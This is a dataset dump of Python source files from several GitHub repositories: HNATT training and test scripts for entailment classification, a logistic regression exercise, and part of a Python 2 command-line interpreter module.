[ { "alpha_fraction": 0.6078216433525085, "alphanum_fraction": 0.6242690086364746, "avg_line_length": 14.342696189880371, "blob_id": "9fa8c01dfd2b9db40427d99ad3f9f92395e8ffc4", "content_id": "bf837004dfb86247f61556970b1e4a64c8ab7ea3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2736, "license_type": "permissive", "max_line_length": 87, "num_lines": 178, "path": "/test.py", "repo_name": "saurabhvyas/hnatt", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[1]:\n\n\nimport sys\n#from tqdm import tqdm\n\n# In[2]:\n\n\n\"\"\" \narguments :\nfirst argument: location of test csv , format should be x1(premise) , x2(hypo) , target\nsee data folder for example csv\n\nsecond argument: whether to use mode 0 or mode1(prediction each example in testset)\nin mode 0, it will only report test set accuracy\nin mode 1, it will give output for each example in test set\n\n\"\"\"\ntest_set_file=sys.argv[1]\nmode=sys.argv[2]\n\n\n# In[3]:\n\n\n#import util.yelp as yelp\nimport numpy as np\nfrom util.text_util import normalize\n\nfrom hnatt import HNATT\n\n#YELP_DATA_PATH = 'data/yelp-dataset/yelp.csv'\nSAVED_MODEL_DIR = 'saved_models'\nSAVED_MODEL_FILENAME = 'model.h5'\nEMBEDDINGS_PATH = 'saved_models/glove.6B.100d.txt'\n\nimport pandas as pd\n\n\n# In[ ]:\n\n\ntry:\n print('reading ' + test_set_file + ' .. ')\n df_test=pd.read_csv(test_set_file)\nexcept:\n print('couldnot read csv file')\n\n\n# In[ ]:\n\n\nprint('''\nclass labels:\n0 : entails\n2 : contradiction\n1 : neutral\n''')\n\n\n# In[ ]:\n\ndata_classes = [\"entails\", \"neutral\", \"contradiction\"]\ndf_test[\"x1\"] = df_test[\"x1\"] + \" \" + df_test[\"x2\"]\ndf_test['target']=df_test['target'].apply(data_classes.index)\n\nprint(df_test['target'][:5])\n\n\n# In[ ]:\n\n\ndf_test=df_test.dropna()\n\n\n# In[ ]:\n\n\ncol_text = 'x1'\ncol_target = 'target'\n\n\n# In[ ]:\n\n\ny_test = df_test[col_target]\n\n\n# In[ ]:\n\n\ndef to_one_hot(labels, dim=5):\n\tresults = np.zeros((len(labels), dim))\n\tfor i, label in enumerate(labels):\n\t\tresults[i][label - 1] = 1\n\treturn results\n\n\n# In[ ]:\n\n\ndef predict_single(text):\n ntext = normalize(text)\n preds = h.predict([ntext])[0]\n prediction = np.argmax(preds).astype(float)\n return prediction\n\n\n# In[ ]:\n\n\n# load pretrained model\ntry:\n print('loading pretrained model ..')\n h = HNATT()\n h.load_weights(SAVED_MODEL_DIR, SAVED_MODEL_FILENAME)\nexcept:\n print('unable to load pretrained model')\n\n\n# In[ ]:\n\n\nif mode=='0':\n print(df_test['x1'][:5])\n df_test['text_tokens']=df_test['x1'].apply(lambda x: normalize(x))\n\n#df['text_tokens'] = df['x1'].progress_apply(lambda x: normalize(x))\n#train_set['len'] = train_set['text_tokens'].apply(lambda x: len(x))\n\n test_x = np.empty((0,))\n test_y = np.empty((0,))\n\n test_x=df_test['text_tokens']\n#train_y=train_set['']\n\n\n\n test_y = to_one_hot(y_test, dim=3)\n print(h.model.metrics_names)\n # test on test set\n loss_and_metrics = h.test(test_x, test_y, batch_size=64)\n print(loss_and_metrics)\n #print(test_x[0])\n #print(test_y[0])\nelse:\n print('running mode 1 , printing ouput for each test example')\n for row in df_test.itertuples():\n print(row.x1)\n print(predict_single(row.x1))\n \n \n\n\n# In[ ]:\n\n\n\n \n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[4]:\n\n\n\n\n" }, { "alpha_fraction": 0.6294492483139038, "alphanum_fraction": 0.6556763052940369, "avg_line_length": 14.645161628723145, "blob_id": "c6835dd98a71083d84454f1ed927143510d95eeb", "content_id": "2eee7a7ea52e4f5de284d823c5faceb48863278d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5338, "license_type": "permissive", "max_line_length": 99, "num_lines": 341, "path": "/train_oursv3.py", "repo_name": "saurabhvyas/hnatt", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[1]:\n\n\nimport util.yelp as yelp\nimport numpy as np\nfrom util.text_util import normalize\n\nfrom hnatt import HNATT\n\n#YELP_DATA_PATH = 'data/yelp-dataset/yelp.csv'\nSAVED_MODEL_DIR = 'saved_models'\nSAVED_MODEL_FILENAME = 'model.h5'\nEMBEDDINGS_PATH = 'saved_models/glove.6B.100d.txt'\n\nimport pandas as pd\n\n\n# In[2]:\n\n\nfrom keras import backend as K\nprint(K.tensorflow_backend._get_available_gpus())\n\n\n# In[3]:\n\n\ndf=pd.read_csv('data/preprocessing/preprocessing_scripts/output/concatenated_train_pandas.csv')\ndf_valid=pd.read_csv('data/preprocessing/preprocessing_scripts/output/concatenated_dev_pandas.csv')\ndf_test=pd.read_csv('data/concatenated_test_pandas.csv')\n\n\n# In[4]:\n\n\n#print(df[\"x1\"][0])\n#print(df[\"x2\"][0])\n\n\n# In[5]:\n\n\ndf[\"x1\"] = df[\"x1\"] + \" \" + df[\"x2\"]\ndf_valid[\"x1\"] = df_valid[\"x1\"] + \" \" + df_valid[\"x2\"]\ndf_test[\"x1\"] = df_test[\"x1\"] + \" \" + df_test[\"x2\"]\n\n\n# In[6]:\n\n\n#print(df[\"x1\"][5])\n\n\n# In[7]:\n\n\n#print(df_test['x1'][6])\n\n\n# In[8]:\n\n\n#print(df_valid['target'])\n\n\n# In[9]:\n\n\n#for row in df_test.itertuples():\n # print(row.x1)\n\n\n# In[10]:\n\n\n# convert class labels into class indices\ndata_classes = [\"entails\", \"neutral\", \"contradiction\"]\ndf['target']=df['target'].apply(data_classes.index)\ndf_valid['target']=df_valid['target'].apply(data_classes.index)\ndf_test['target']=df_test['target'].apply(data_classes.index)\n\n\n# In[11]:\n\n\n#print(df_test['target'][:15])\n\n\n# In[12]:\n\n\ndf=df.dropna()\ndf_valid=df_valid.dropna()\ndf_test=df_test.dropna()\n\n\n# In[13]:\n\n\n#df=df[:int(df.shape[0]*0.001)]\n#df_valid=df_valid[:int(df_valid.shape[0]*0.001)]\n#df_test=df_test[:int(df_test.shape[0]*0.001)]\n\n\n# In[14]:\n\n\ncol_text = 'x1'\ncol_target = 'target'\n\n\n# In[15]:\n\n\ny_train = df[col_target]\ny_test = df_test[col_target]\ny_val = df_valid[col_target]\n\n\n# In[16]:\n\n\n#print(y_val[4])\n\n\n# In[17]:\n\n\n#train_x=df[\"x1\"]\n#train_y=y_train\n\n\n# In[18]:\n\n\n#train_y.shape\n\n\n# In[19]:\n\n\n'''\nh = HNATT()\t\nh.train(train_x, train_y, \nbatch_size=16,\nepochs=16,\nembeddings_path=None)\n\n#h.load_weights(SAVED_MODEL_DIR, SAVED_MODEL_FILENAME)\n\n\n\n# print attention activation maps across sentences and words per sentence\nactivation_maps = h.activation_maps(\n'they have some pretty interesting things here. i will definitely go back again.')\nprint(activation_maps)\n'''\n\n\n# In[20]:\n\n\n#(train_x, train_y), (test_x, test_y) = yelp.load_data(path='yelp.csv', size=1e4)\n\n\n# In[21]:\n\n\ndef to_one_hot(labels, dim=5):\n\tresults = np.zeros((len(labels), dim))\n\tfor i, label in enumerate(labels):\n\t\tresults[i][label - 1] = 1\n\treturn results\n\n\n# In[22]:\n\n\nprint('loading training set ...')\ndf['text_tokens'] = df['x1'].progress_apply(lambda x: normalize(x))\n#train_set['len'] = train_set['text_tokens'].apply(lambda x: len(x))\n\ntrain_x = np.empty((0,))\ntrain_y = np.empty((0,))\n\ntraining_len=df['x1'].shape[0]\n\n#train_set = df[0:training_len].copy()\n#train_set['len'] = train_set['text_tokens'].apply(lambda x: len(x))\n\ntrain_x=df['text_tokens']\n#train_y=train_set['']\n\n\n\ntrain_y = to_one_hot(y_train, dim=3)\nprint(train_x[0])\nprint(train_y[0])\n\n#test_y = to_one_hot(test_y)\n\n\n# In[23]:\n\n\n# preprocess test_x , as above block\nprint('loading test set ...')\ndf_test['text_tokens']=df_test['x1'].progress_apply(lambda x: normalize(x))\n\n#df['text_tokens'] = df['x1'].progress_apply(lambda x: normalize(x))\n#train_set['len'] = train_set['text_tokens'].apply(lambda x: len(x))\n\ntest_x = np.empty((0,))\ntest_y = np.empty((0,))\n\ntest_x=df_test['text_tokens']\n#train_y=train_set['']\n\n\n\ntest_y = to_one_hot(y_test, dim=3)\nprint(test_x[0])\nprint(test_y[0])\n\n\n\n# In[24]:\n\n\n#preprocess val_x , as above block\nprint('loading validation set ...')\n\ndf_valid['text_tokens']=df_valid['x1'].progress_apply(lambda x: normalize(x))\n\n#df['text_tokens'] = df['x1'].progress_apply(lambda x: normalize(x))\n#train_set['len'] = train_set['text_tokens'].apply(lambda x: len(x))\n\nvalid_x = np.empty((0,))\nvalid_y = np.empty((0,))\n\nvalid_x=df_valid['text_tokens']\n#train_y=train_set['']\n\n\n\nvalid_y = to_one_hot(y_val, dim=3)\nprint(valid_x[0])\nprint(valid_y[0])\n\n\n# In[25]:\n\n\n# load pretrained model\nprint('loading pretrained model / restoring model ...')\nh = HNATT()\nh.load_weights(SAVED_MODEL_DIR, SAVED_MODEL_FILENAME)\n\n\n# In[38]:\n\n\n# test on test set\n#loss_and_metrics = h.test(test_x, test_y, batch_size=64)\n#print(loss_and_metrics)\n\n\n# In[39]:\n\n\n#h.model.metrics_names\n\n\n# In[45]:\n\n\n#valid_y[0]\n\n\n# In[26]:\n\n\n#h = HNATT()\t\nh.train(train_x, train_y,valid_x,valid_y,\nbatch_size=64,\nepochs=16,\nembeddings_path=None,saved_model_dir=SAVED_MODEL_DIR,\nsaved_model_filename='mnli.h5')\n\n#h.load_weights(SAVED_MODEL_DIR, SAVED_MODEL_FILENAME)\n\n\n\n# print attention activation maps across sentences and words per sentence\n#activation_maps = h.activation_maps(\n#'they have some pretty interesting things here. i will definitely go back again.')\n#print(activation_maps)\n\n\n# In[ ]:\n\n\n''' \nactivation_maps = h.activation_maps(\n'they have some pretty interesting things here. i will definitely go back again.')\nprint(activation_maps)\n'''\n\n\n# In[24]:\n\n\n#train_y[0]\n\n\n# In[23]:\n\n\n#h.model.summary()\n\n\n# In[9]:\n\n\n'''\ntext='he was not well, he stayed at home only. he didnt go to office '\n\nntext = normalize(text)\npreds = h.predict([ntext])[0]\nprediction = np.argmax(preds).astype(float)\nprint(prediction)\n'''\n\n\n# In[ ]:\n\n\n#he is dancing with joy because its his birthday. he is very happy\n# \n\n" } ]
2
saurabhguptarock/LogisticRegression-Pandas-Data
https://github.com/saurabhguptarock/LogisticRegression-Pandas-Data
f8471200bd64ce265ce4d108f3f13d83a23c3aa6
9d288eaeb66f2f75db444ebb9ccdc27498e7de99
448e10527f33011e1ace7f70e1f0fdb07e98d143
refs/heads/master
2020-04-12T03:27:00.019406
2018-12-18T10:00:50
2018-12-18T10:00:50
162,267,560
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4848484992980957, "alphanum_fraction": 0.5104895234107971, "avg_line_length": 18.428571701049805, "blob_id": "fe82083bc81ef7db770a8d7373fddd1c605b7ddc", "content_id": "b9c9a71010cee6082c005ee3e8f8e873265805cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2145, "license_type": "no_license", "max_line_length": 74, "num_lines": 105, "path": "/LogisticRegression Using Pandas Data Assignment.py", "repo_name": "saurabhguptarock/LogisticRegression-Pandas-Data", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\ndfx = pd.read_csv('logisticX.csv')\r\ndfy = pd.read_csv('logisticY.csv')\r\n\r\nX = dfx.values\r\nY = dfy.values\r\n\r\ndata = np.hstack((X, Y))\r\n\r\nnp.random.shuffle(data)\r\nsplit = int(.8 * data.shape[0])\r\n\r\nX_train = data[:split, :-1]\r\nX_test = data[split:, :-1]\r\n\r\nY_train = data[:split, -1]\r\nY_test = data[split:, -1]\r\n\r\n\r\ndef hypothesis(x, w, b):\r\n h = np.dot(x, w) + b\r\n return sigmoid(h)\r\n\r\n\r\ndef sigmoid(z):\r\n return 1.0 / (1.0 + np.exp(-1.0 * z))\r\n\r\n\r\ndef error(y_true, x, w, b):\r\n m = x.shape[0]\r\n err = 0.0\r\n\r\n for i in range(m):\r\n hx = hypothesis(x[i], w, b)\r\n err += y_true[i] * np.log2(hx) + (1 - y_true[i]) * np.log2(1 - hx)\r\n\r\n return -err / m\r\n\r\n\r\ndef get_grads(y_true, x, w, b):\r\n grad_w = np.zeros(w.shape)\r\n grad_b = 0.0\r\n\r\n m = x.shape[0]\r\n\r\n for i in range(m):\r\n hx = hypothesis(x[i], w, b)\r\n grad_w += (y_true[i] - hx) * x[i]\r\n grad_b += (y_true[i] - hx)\r\n\r\n grad_b /= m\r\n grad_w /= m\r\n return [grad_w, grad_b]\r\n\r\n\r\ndef grad_descent(x, y_true, w, b, learning_rate=0.1):\r\n err = error(y_true, x, w, b)\r\n [grad_w, grad_b] = get_grads(y_true, x, w, b)\r\n\r\n w = w + learning_rate * grad_w\r\n b = b + learning_rate * grad_b\r\n\r\n return err, w, b\r\n\r\n\r\ndef predict(x, w, b):\r\n confidence = hypothesis(x, w, b)\r\n\r\n if confidence < 0.5:\r\n return 0\r\n else:\r\n return 1\r\n\r\n\r\ndef get_acc(x_tst, y_tst, w, b):\r\n y_pred = []\r\n\r\n for i in range(y_tst.shape[0]):\r\n p = predict(x_tst[i], w, b)\r\n y_pred.append(p)\r\n\r\n y_pred = np.array(y_pred)\r\n return float((y_pred == y_tst).sum()) / y_tst.shape[0]\r\n\r\n\r\nloss = []\r\nacc = []\r\n\r\nW = np.random.random((X.shape[1],))\r\nb = np.random.random()\r\n\r\nfor i in range(1000):\r\n l, W, b = grad_descent(X_train, Y_train, W, b, learning_rate=0.5)\r\n acc.append(get_acc(X_test, Y_test, W, b))\r\n loss.append(l)\r\n\r\nplt.scatter(X[:49, 0], X[:49, 1])\r\nplt.scatter(X[50:, 0], X[50:, 1], color='orange')\r\nx = np.linspace(2, 8, 10)\r\ny = - (W[0] * x + b) / W[1]\r\nplt.plot(x, y, color='black')\r\nplt.show()\r\n" }, { "alpha_fraction": 0.8488371968269348, "alphanum_fraction": 0.8488371968269348, "avg_line_length": 41.5, "blob_id": "e06df2b252fede92c71c872e3dd14d2d3eaa2984", "content_id": "ac733b0ad687d44518c5fbecca13f431cb4e3862", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 86, "license_type": "no_license", "max_line_length": 51, "num_lines": 2, "path": "/README.md", "repo_name": "saurabhguptarock/LogisticRegression-Pandas-Data", "src_encoding": "UTF-8", "text": "# LogisticRegression-Pandas-Data\nLogistic Regression With Algorithm With pandas data \n" } ]
2
tak-mahal/pimouse_run_corridor
https://github.com/tak-mahal/pimouse_run_corridor
c2b7afc3d61912ff15733c325e7b2065be933a40
aaaf876a4c4cfea5a247eef88bc7efeeeb0fca42
be7369239b152736d0107ba58593ed690d04e21b
refs/heads/master
2020-04-13T17:47:33.370024
2019-01-06T04:41:09
2019-01-06T04:41:09
163,356,300
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7638888955116272, "alphanum_fraction": 0.7638888955116272, "avg_line_length": 143, "blob_id": "b25d4610bed704aab1aa4704b5fcdf93ed1a7b6c", "content_id": "80db89a61da4ed1c1581eae834dd3b06bf2c4cf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 144, "license_type": "no_license", "max_line_length": 143, "num_lines": 1, "path": "/README.md", "repo_name": "tak-mahal/pimouse_run_corridor", "src_encoding": "UTF-8", "text": "[![Build Status](https://travis-ci.org/tak-mahal/pimouse_run_corridor.svg?branch=master)](https://travis-ci.org/tak-mahal/pimouse_run_corridor)\n" }, { "alpha_fraction": 0.567251443862915, "alphanum_fraction": 0.594298243522644, "avg_line_length": 34.07692337036133, "blob_id": "c8fa2417c1891e967a520de949c51800c668d27d", "content_id": "f08e84f6af50b42d573b87ee6ce803aa2a2a5c4c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1368, "license_type": "no_license", "max_line_length": 85, "num_lines": 39, "path": "/test/travis_test_wall_around.py", "repo_name": "tak-mahal/pimouse_run_corridor", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport unittest, rostest\nimport rosnode, rospy\nimport time\n\nclass WallAroundTest(unittest.TestCase):\n def set_and_get(self,lf,ls,rs,rf):\n with open(\"/dev/rtlightsensor0\",\"w\") as f:\n f.write(\"%d %d %d %d\\n\" % (rf,rs,ls,lf))\n\n time.sleep(0.3)\n\n with open(\"/dev/rtmotor_raw_l0\",\"r\") as lf,\\\n open(\"/dev/rtmotor_raw_r0\",\"r\") as rf:\n left = int(lf.readline().rstrip())\n right = int(rf.readline().rstrip())\n\n return left, right\n\n def test_io(self):\n left, right = self.set_and_get(60,0,0,0) #front_left > 50\n self.assertTrue(left > right, \"don't turn right\")\n\n left, right = self.set_and_get(0,0,60,0) #right_side > 50\n self.assertTrue(left < right, \"don't turn left\")\n\n left, right = self.set_and_get(0,60,0,0) #left_side > 50\n self.assertTrue(left > right, \"don't turn right\")\n\n left, right = self.set_and_get(0,10,0,0) #curve to right\n self.assertTrue(left < right ,\"don't curve to left\")\n\n #left, right = self.set_and_get(0,5,0,0) #don't controll when far from wall\n #self.assertTrue(0 < left == right, \"curve wrongly\")\n\nif __name__ == '__main__':\n time.sleep(3)\n rospy.init_node('travis_test_wall_around')\n rostest.rosrun('pimouse_run_corridor', 'travis_test_wall_around', WallAroundTest)\n" } ]
2
fdumpling/practices
https://github.com/fdumpling/practices
b86a5803c6c18c53643b0700d0a575f4182c9dfb
53d3bd69bfacd7cf73635fa787b7e390b2015c1e
f1a79583a1afde2a8b7212a9a7ccbc8488603977
refs/heads/master
2015-08-04T09:03:36.639966
2014-02-24T15:24:45
2014-02-24T15:24:45
6,406,427
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6344423890113831, "alphanum_fraction": 0.6426610946655273, "avg_line_length": 26.949445724487305, "blob_id": "3848606a5d6c8f3e1d20bfb42a98592efc746bf6", "content_id": "8f0ac03e8db789e645c78a5c528264ac45c5a8fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 63027, "license_type": "no_license", "max_line_length": 114, "num_lines": 2255, "path": "/automation/open/lib/CLI.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.3\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# License: LGPL\n# Keith Dart <[email protected]>\n\"\"\"\nProvides a standard command line interpreter for programs needing one.\nSupports different command contexts, customizable user interface, generic\nobject CLI's, and other neat stuff.\n\n\"\"\"\nfrom __future__ import generators\n\n__all__ = ['CommandQuit', 'NewCommand', 'BaseCommands',\n'DictCLI', 'GenericCLI', 'FileCLI', 'Completer', 'Shell', 'ConsoleIO', 'Theme',\n'DefaultTheme', 'UserInterface', 'CommandParser', 'globargv', 'breakout_args',\n'clieval', 'get_generic_cmd', 'get_generic_clone', 'get_generic_cli',\n'run_cli_wrapper', 'run_cli', 'run_generic_cli', 'get_cli']\n\nimport sys, os, time\nfrom cStringIO import StringIO\n\ntry:\n\timport readline # readline is very, very important to us...\n\tPROMPT_START_IGNORE = '\\001'\n\tPROMPT_END_IGNORE = '\\002'\nexcept ImportError:\n\treadline = None # ...but try to live without it if it is not available.\n\tPROMPT_START_IGNORE = ''\n\tPROMPT_END_IGNORE = ''\n\nimport nmsgetopt\nimport termtools\nimport cliutils\nimport environ\nfrom fsm import FSM, ANY\n\n# global timer for timing methods\nimport scheduler\ntimer = scheduler.get_scheduler()\ndel scheduler\n\nMethodType = type(timer.sleep) # cheat\n_DEBUG = False\n\n\nclass CLIException(Exception):\n\tdef __init__(self, value=None):\n\t\tself.value = value\n\nclass CommandQuit(CLIException):\n\t\"\"\"An exception that is used to signal quiting from a command object. \"\"\"\n\tpass\nclass CommandExit(CLIException):\n\t\"\"\"An exception that is used to signal exiting from the command object. The\n\tcommand is not popped. \"\"\"\n\tpass\nclass NewCommand(CLIException):\n\t\"\"\"Used to signal the parser to push a new command object.\nRaise this with an instance of BaseCommands as a value.\"\"\"\n\tpass\nadd_exception(CommandQuit)\nadd_exception(CommandExit)\nadd_exception(NewCommand)\n\nclass BaseCLI(object):\n\t\"\"\"A base class that defines a holder object for command methods. It dispatches\nthe methods when you call it with an argv-style list of arguments. The first\nargument must match a name of a method.\n\"\"\"\n\tdef __init__(self, ui, aliases=None):\n\t\t# initialize local variables\n\t\tself._aliases = aliases or {}\n\t\tself._command_list = None\n\t\tself._repeater = None\n\t\tself._completion_scopes = {}\n\t\tself._completers = []\n\t\tself._obj = None # may be in instance of some interface commands may use.\n\t\tself.set_userinterface(ui)\n\t\tself.initialize()\n\n\t# optional extra initialization. Override in subclass if desired.\n\tdef initialize(self):\n\t\tpass\n\n\t# optional finalize method. called when CLI quits.\n\tdef finalize(self):\n\t\tpass\n\n\tdef set_userinterface(self, ui):\n\t\tself._ui = ui\n\t\t# map in user interface input and output for speed\n\t\tself._user_input = ui.user_input\n\t\tself._more_user_input = ui.more_user_input\n\t\tself._print = ui.Print\n\t\tself._printf = ui.printf\n\t\tself._pprint = ui.pprint\n\t\tself._format = ui.format\n\t\tself._print_list = ui.print_list\n\t\tself._set_theme = ui.set_theme\n\t\tself._environ = ui._env\n\n\t# override this and call it for command sets the need post-instantiation setup.\n\tdef _setup(self, obj, prompt=\"\"):\n\t\tself._obj = obj # an object to call methods on, if needed\n\t\tself._environ[\"PS1\"] = \"%s> \" % (prompt,)\n\t\tself._reset_scopes()\n\n\tdef _reset_scopes(self):\n\t\tpass\n\n\t# overrideable exception hook method - do something with command exceptions.\n def except_hook(self, ex, val, tb):\n\t\tglobal _DEBUG\n\t\tif _DEBUG:\n\t\t\timport debugger\n\t\t\tdebugger.post_mortem(ex, val, tb)\n\t\telse:\n \tself._ui.error(\"%s (%s)\" % (ex, val))\n\n\t# override this if your subcommand passes something useful back\n\t# via a parameter to the CommandQuit exception. \n\tdef handle_subcommand(self, value):\n\t\tpass\n\n\t# override this for default actions\n\tdef default_command(self, argv):\n\t\tself._ui.error(\"unknown command: %r\" % (argv[0]))\n\t\treturn 2\n\n\t# completer management methods\n\tdef add_completion_scope(self, name, complist):\n\t\tself._completion_scopes[name] = list(complist)\n\n\tdef get_completion_scope(self, name=\"commands\"):\n\t\treturn self._completion_scopes.get(name, [])\n\n\tdef remove_completion_scope(self, name):\n\t\tdel self._completion_scopes[name]\n\n\tdef push_completer(self, namespace):\n\t\tif readline:\n\t\t\torig = readline.get_completer()\n\t\t\tif orig is not None:\n\t\t\t\tself._completers.append(orig)\n\t\t\treadline.set_completer(Completer(namespace).complete)\n\n\tdef pop_completer(self):\n\t\tif readline:\n\t\t\tif self._completers:\n\t\t\t\tc = self._completers.pop()\n\t\t\t\treadline.set_completer(c)\n\n\t# convenient access to option parsing.\n\tdef getopt(self, argv, shortopts):\n\t\treturn nmsgetopt.getopt(argv[1:], shortopts)\n\t\t# returns: optlist, longoptdict, args\n\n\t# dispatch commands by calling the instance\n\tdef __call__(self, argv):\n\t\tif not argv or not argv[0] or argv[0].startswith(\"_\"):\n\t\t\treturn 2\n\t\targv = self._expand_aliases(argv)\n\t\t# special escape characters...\n\t\tif argv[0].startswith(\"#\"): # comment\n\t\t\treturn 0\n\t\ttry:\n\t\t\tmeth = getattr(self, argv[0])\n\t\texcept AttributeError:\n\t\t\treturn self.default_command(argv)\n\t\t# ...and exec it.\n\t\ttry:\n\t\t\trv = meth(argv) # call the method\n\t\texcept (NewCommand, CommandQuit, CommandExit, KeyboardInterrupt):\n\t\t\traise # pass these through to parser\n\t\texcept IndexError: # tried to get non-existent argv value\n\t\t\tself._print(meth.__doc__)\n\t\texcept GetoptError, err:\n\t\t\tself._print(\"option %r: %s\" % (err.opt, err.msg))\n\t\texcept:\n\t\t\tex, val, tb = sys.exc_info()\n\t\t\tself.except_hook(ex, val, tb)\n\t\telse:\n\t\t\ttry:\n\t\t\t\tself._environ[\"?\"] = int(rv)\n\t\t\texcept (ValueError, TypeError, AttributeError):\n\t\t\t\tself._environ[\"?\"] = 99\n\t\t\tself._environ[\"_\"] = rv\n\t\t\treturn rv\n\n\tdef _expand_aliases(self, argv):\n\t\tseen = {}\n\t\twhile 1:\n\t\t\talias = self._aliases.get(argv[0], None)\n\t\t\tif alias:\n\t\t\t\tif alias[0] in seen:\n\t\t\t\t\tbreak # alias loop\n\t\t\t\tseen[alias[0]] = True\n\t\t\t\t# do the substitution\n\t\t\t\tdel argv[0]\n\t\t\t\trl = alias[:]\n\t\t\t\trl.reverse()\n\t\t\t\tfor arg in rl:\n\t\t\t\t\targv.insert(0, arg)\n\t\t\telse:\n\t\t\t\tbreak\n\t\treturn argv\n\n\tdef _export(self, name, val):\n\t\t\"\"\"put a name-value pair in the environment.\"\"\"\n\t\tself._environ[name] = val\n\n\t# Start a new BaseCommands (or subclass), with the same environment.\n\t# The new command object gets a copy of the environment, but the same aliases.\n\tdef clone(self, cliclass=None, theme=None):\n\t\tif cliclass is None:\n\t\t\tcliclass = self.__class__\n\t\tnewui = self._ui.clone(theme)\n\t\treturn cliclass(newui, self._aliases)\n\n\tdef subshell(self, io, env=None, aliases=None, theme=None):\n\t\tcliclass = self.__class__\n\t\tnewui = UserInterface(io, env or self._environ.copy(), theme)\n\t\taliases = aliases or self._aliases\n\t\treturn cliclass(newui, aliases)\n\n\tdef get_commands(self):\n\t\tif self._command_list is None:\n\t\t\thashfilter = {}\n\t\t\tfor name in filter(self._command_filt, dir(self)):\n\t\t\t\t## this filters out aliases (same function id)\n\t\t\t\tmeth = getattr(self, name)\n\t\t\t\thashfilter[id(meth.im_func)] = meth.im_func.func_name\n\t\t\tself._command_list = hashfilter.values()\n\t\t\tself._command_list.sort()\n\t\treturn self._command_list\n\n\t# user visible commands are methods that don't have a leading underscore,\n\t# and do have a docstring.\n\tdef _command_filt(self, objname):\n\t\tif objname.startswith(\"_\"):\n\t\t\treturn 0\n\t\tobj = getattr(self, objname)\n\t\tif type(obj) is MethodType and obj.__doc__:\n\t\t\treturn 1\n\t\telse:\n\t\t\treturn 0\n\n\tdef commandlist(self, argv):\n\t\tself._print_list(self.get_commands())\n\n\t# most basic standard commands follow\n\tdef unset(self, argv):\n\t\t\"\"\"unset <envar>\n Unsets the environment variable.\"\"\"\n\t\ttry:\n\t\t\tdel self._environ[argv[1]]\n\t\texcept:\n\t\t\treturn 1\n\n\tdef setenv(self, argv):\n\t\t\"\"\"setenv NAME VALUE\n Sets the environment variable NAME to VALUE, ala C shell. \"\"\"\n\t\tif len(argv) < 3:\n\t\t\tself._print(self.setenv.__doc__)\n\t\t\treturn\n\t\tself._environ[argv[1]] = argv[2]\n\t\treturn self._environ[\"_\"]\n\n\tdef echo(self, argv):\n\t\t\"\"\"echo ...\n Echoes arguments back.\t\"\"\"\n\t\tself._print(\" \".join(argv[1:]))\n\t\treturn self._environ[\"_\"]\n\n\tdef printf(self, argv):\n\t\t\"\"\"printf [<format>] <args>....\n Print the arguments according to the format, \n or all arguments if first is not a format string.\"\"\"\n\t\tif argv[1].find(\"%\") >= 0:\n\t\t\ttry:\n\t\t\t\tns = vars(self._obj)\n\t\t\texcept:\n\t\t\t\tns = globals()\n\t\t\targs, kwargs = breakout_args(argv[2:], ns)\n\t\t\tself._print(str(argv[1]) % args)\n\t\telse:\n\t\t\tself._print(\" \".join(argv[1:]))\n\n\tdef exit(self, argv):\n\t\t\"\"\"exit\n Exits this command interpreter instance. \"\"\"\n\t\traise CommandQuit\n\tquit = exit\n\n\tdef printenv(self, argv):\n\t\t\"\"\"printenv [name ...]\n Shows the shell environment that processes will run with. \"\"\"\n\t\tif len(argv) == 1:\n\t\t\tnames = self._environ.keys()\n\t\t\tnames.sort()\n\t\t\tms = reduce(max, map(len, names))\n\t\t\tfor name in names:\n\t\t\t\tvalue = self._environ[name]\n\t\t\t\tself._print(\"%*s = %s\" % (ms, name, _safe_repr(value, {}, None, 0)))\n\t\telse:\n\t\t\ts = []\n\t\t\tfor name in argv[1:]:\n\t\t\t\ttry:\n\t\t\t\t\ts.append(\"%s=%s\" % (name, _safe_repr(self._environ[name], {}, None, 0)))\n\t\t\t\texcept KeyError:\n\t\t\t\t\tpass\n\t\t\tself._print(\"\\n\".join(s))\n\n\tdef history(self, argv):\n\t\t\"\"\"history [<index>]\n Display the current readline history buffer.\"\"\"\n\t\tif not readline:\n\t\t\tself._print(\"The readline library is not available.\")\n\t\t\treturn\n\t\tif len(argv) > 1:\n\t\t\tidx = int(argv[1])\n\t\t\tself._print(readline.get_history_item(idx))\n\t\telse:\n\t\t\tfor i in xrange(readline.get_current_history_length()):\n\t\t\t\tself._print(readline.get_history_item(i))\n\n\tdef export(self, argv):\n\t\t\"\"\"export NAME=VAL\n Sets environment variable that new processes will inherit.\n\t\"\"\"\n\t\tfor arg in argv[1:]:\n\t\t\ttry:\n\t\t\t\tself._environ.export(arg)\n\t\t\texcept:\n\t\t\t\tex, val = sys.exc_info()[:2]\n\t\t\t\tself._print(\"** could not set value: %s (%s)\" % (ex, val))\n\t\n\tdef help(self, argv):\n\t\t\"\"\"help [-lLcia] [<commandname>]...\n Print a list of available commands, or information about a command,\n if the name is given. Options:\n -l Shows only local (object specific) commands.\n -c Shows only the dynamic commands.\n -L shows only local and dynamic commands.\n -i Shows only the inherited commands from the parent context.\n -a Shows all commands (default)\n\t\t\"\"\"\n\t\tlocal=True ; created=True ; inherited=True\n\t\topts, longs, args = self.getopt(argv, 